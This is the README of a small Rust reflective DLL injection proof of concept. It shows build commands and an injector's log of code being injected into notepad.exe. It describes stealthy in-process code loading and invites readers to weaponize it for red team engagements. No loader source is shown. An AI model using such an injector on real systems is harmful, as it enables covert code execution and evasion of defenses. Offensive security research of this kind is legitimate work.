Rusty Reflective DLL Injection - A small reflective loader in Rust 4KB in size

Reflective Loader in Rust (4KB in size)

A small reflective loader PoC in Rust. I remade this from my old project (https://github.com/memN0ps/arsenal-rs/tree/main/rdi-rs), which is almost the same but has a smaller file size, thanks to this repo: https://github.com/johnthagen/min-sized-rust

Features

More coming soon, maybe, or maybe I'll modify the Shellcode Reflective DLL Injection project to work better: https://github.com/memN0ps/srdi-rs

Example

Bring your own injector (BYOI) or use the simple injector in this PoC for testing.

  1. Open notepad.exe

  2. Build the reflective_loader project in release.

PS C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader> cargo build --release
   Compiling reflective_loader v0.1.0 (C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader)
    Finished release [optimized] target(s) in 0.48s
PS C:\Users\developer\Documents\GitHub\rdi-rs\reflective_loader>
  3. Set the PowerShell environment variable for debugging and run cargo run
C:\Users\developer\Documents\GitHub\rdi-rs\inject> $Env:RUST_LOG="info"

PS C:\Users\developer\Documents\GitHub\rdi-rs\inject> cargo run

[2023-03-21T09:29:31Z INFO  inject] [+] Process ID: 3028
[2023-03-21T09:29:31Z INFO  inject] [+] IMAGE_DOS_HEADER: 0x7ff72e8080d0
[2023-03-21T09:29:31Z INFO  inject] [+] IMAGE_NT_HEADERS: 0x7ff72e8081a8
[2023-03-21T09:29:31Z INFO  inject] [+] Process handle: 244
[2023-03-21T09:29:31Z INFO  inject] [+] Remote allocated memory region for the dll: 0x19162c10000
[2023-03-21T09:29:31Z INFO  inject] [+] Local Reflective Loader Address/offset: 0x7ff72e8084d0
[2023-03-21T09:29:31Z INFO  inject] [+] Remote Reflective Loader Address/offset: 0x19162c10400
[2023-03-21T09:29:31Z INFO  inject] [+] entry_point: 0x19162c1151b
[2023-03-21T09:29:31Z INFO  inject] [+] Injection Completed
  4. You should see the following

[Image: poc]

  5. File size

[Image: size]

[Image: size]

Note: This is just a PoC, and there is still some OPSEC to worry about. I'll leave that as an exercise for the user. I have included the references below for you to check out to weaponize this for red team engagements.

Credits / References / Motivation / Thanks
